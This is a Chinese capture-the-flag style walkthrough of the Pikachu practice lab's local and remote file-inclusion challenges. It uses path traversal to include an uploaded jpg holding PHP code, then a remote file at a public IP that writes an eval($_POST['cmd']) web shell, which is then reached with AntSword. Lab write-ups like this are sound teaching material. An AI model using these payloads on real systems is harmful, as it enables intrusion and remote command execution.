pikachu文件包含漏洞靶场攻略

一、File inclusion(local)(本地文件包含)

1.打开pikachu的本机包含文件靶场

2.随意提交查询

可以看到是get传参 可以在filename参数进行文件包含

3.准备好一个jpg文件

<?php phpinfo(); ?>将内容写到1.jpg中

点击上传文件 上传1.jpg

文件上传成功

4.filename后面输入../../../../1.php访问php文件

二、File Inclusion(remote)(远程文件包含)

一,修改配置

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

二,随意提交查询

三,宝塔公网上创建一个6.txt文件,

里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST["cmd"]);?>')?>

四,filename后面输入http://47.121.212.101/6.txt

五,fileinclude目录下找到php文件

六,访问php文件,蚁剑连接

相关推荐
用户962377954482 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主3 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954485 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机5 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机5 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954485 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star5 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954485 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher7 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行10 天前
网络安全总结
安全·web安全